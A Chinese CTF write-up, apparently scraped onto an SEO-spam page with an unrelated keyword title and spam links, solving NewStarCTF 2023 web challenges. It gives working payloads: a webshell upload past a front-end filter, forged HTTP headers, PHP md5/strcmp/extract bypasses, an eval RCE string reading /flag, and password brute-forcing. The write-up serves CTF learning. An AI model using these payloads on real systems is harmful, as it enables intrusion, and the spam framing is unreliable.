当前位置: 首页 > news >正文

微信公众平台客服关键词搜索优化外包

news 2025/8/20 9:15:35
微信公众平台客服,关键词搜索优化外包,芜湖集团网站建设,闽侯福州网站建设目录 ①泄露的秘密 ②Begin of Upload ③Begin of HTTP ④ErrorFlask ⑤Begin of PHP ⑥R!C!E! ⑦EasyLogin ①泄露的秘密 盲猜/robots.txt,访问得到flag前半部分 第二个没试出来,老老实实拿dirsearch扫吧 访问/www.zip 下载附件,拿到第二部分…

目录

①泄露的秘密

②Begin of Upload

③Begin of HTTP

④ErrorFlask 

⑤Begin of PHP 

⑥R!C!E!

⑦EasyLogin 

①泄露的秘密

盲猜/robots.txt,访问得到flag前半部分

第二个没试出来,老老实实拿dirsearch扫吧

访问/www.zip

下载附件,拿到第二部分

 

flag:

flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous} 

②Begin of Upload

随便上传一个php文件

 发现有前端限制

 禁一手js

继续上传 

 

成功传马,直接rce即可,下略 

③Begin of HTTP

常规的题,不多解释

POST /?ctf=1 HTTP/1.1
Host: node4.buuoj.cn:28438
User-Agent: NewStarCTF2023
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: power=ctfer
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Referer:newstarctf.com
X-Real-IP: 127.0.0.1secret=n3wst4rCTF2023g00000d

注意最后的伪造本地请求方式要字典爆破

④ErrorFlask 

看标题表述就是搞破坏让flask报错 

先正常传俩数字,回显告诉我们不是ssti

传个字母试试

payload:

?number1=a&number2=1

成功报错拿到flag

⑤Begin of PHP 

贴出源码

 <?php
error_reporting(0);
highlight_file(__FILE__);if(isset($_GET['key1']) && isset($_GET['key2'])){echo "=Level 1=<br>";if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){$flag1 = True;}else{die("nope,this is level 1");}
}if($flag1){echo "=Level 2=<br>";if(isset($_POST['key3'])){if(md5($_POST['key3']) === sha1($_POST['key3'])){$flag2 = True;}}else{die("nope,this is level 2");}
}if($flag2){echo "=Level 3=<br>";if(isset($_GET['key4'])){if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){$flag3 = True;}else{die("nope,this is level 3");}}
}if($flag3){echo "=Level 4=<br>";if(isset($_GET['key5'])){if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){$flag4 = True;}else{die("nope,this is level 4");}}
}if($flag4){echo "=Level 5=<br>";extract($_POST);foreach($_POST as $var){if(preg_match("/[a-zA-Z0-9]/",$var)){die("nope,this is level 5");}}if($flag5){echo file_get_contents("/flag");}else{die("nope,this is level 5");}
}

payload:

?key1[]=1&key2[]=2&key4[]=1&key5=2024.c

key3[]=1&flag5=![]

主要解释下level3和5 

level 3利用strcmp传入数组会返回0来绕过

level 5利用extract可以解析并创建变量,来psost一个flag5进去(因为发现源码中没有flag5)。另外对post内容做了限制,不能有字母数字,这里可以传一个![]进去,[]空数组会隐式转换为false,在!取反得到我们要的true

⑥R!C!E!

先是构造md5

 (默默掏出工具爆破)

最终payload:

password=114514&e[v.a.l=echo `tac /f*`;

⑦EasyLogin 

进来是个登录框

随便注册一个账号登录看看

没什么用,估计得admin登录

提示密码至少6位,尝试爆破6位密码 

爆破得密码为000000

 登录,发包得到302重定向,在repeater里看即可

http://www.tj-hxxt.cn/news/126137.html

相关文章:

  • 西安市建设协会网站汕头网站关键词推广
  • 招代理的网站要怎么做的产品软文撰写
  • 企业网站建设代理加盟互联网全网推广
  • 龙岩做网站的长沙网站seo优化排名
  • 免费做网站的网页南京网站seo
  • 嘉兴做网站的最火网站排名
  • 阿里云wordpress建站教程网页广告调词平台多少钱
  • 和布克赛尔网站建设百度网盘app怎么打开链接
  • 如何优化网站结构网络暴力事件
  • 5个制造企业电子商务网站北京优化靠谱的公司
  • 网站模板整站资源宁波百度快照优化排名
  • 网站怎么做黑链接制作网页完整步骤代码
  • 南山网站公司郑州网站开发顾问
  • 企业网站开发价在线优化网站
  • 徐州本地网站sem优化师是做什么的
  • javaweb是用java做网站吗百度视频下载
  • 招聘求职网站html模板系列推广软文范例
  • 设计网站如何推广昆明长尾词seo怎么优化
  • 西安二手房热狗seo外包
  • 公司域名让做网站的地推的方法和技巧
  • 织梦制作手机网站尚硅谷培训机构官网
  • 网站建设制作设计seo优化珠海百度竞价是什么意思
  • 有人用dw做网站吗关键词优化课程
  • 在线刷seo单页面网站如何优化
  • 苏州网站建设师引流推广方法
  • 动态网站代做seo去哪里学
  • 美食网站开发目的百度seo优化方法
  • 哪个网站专门做二手电脑手机的企业seo自助建站系统
  • 郑州web网站建设公司比较好的友链平台
  • 外贸b2b网站用什么网站程序做百度快照怎么发布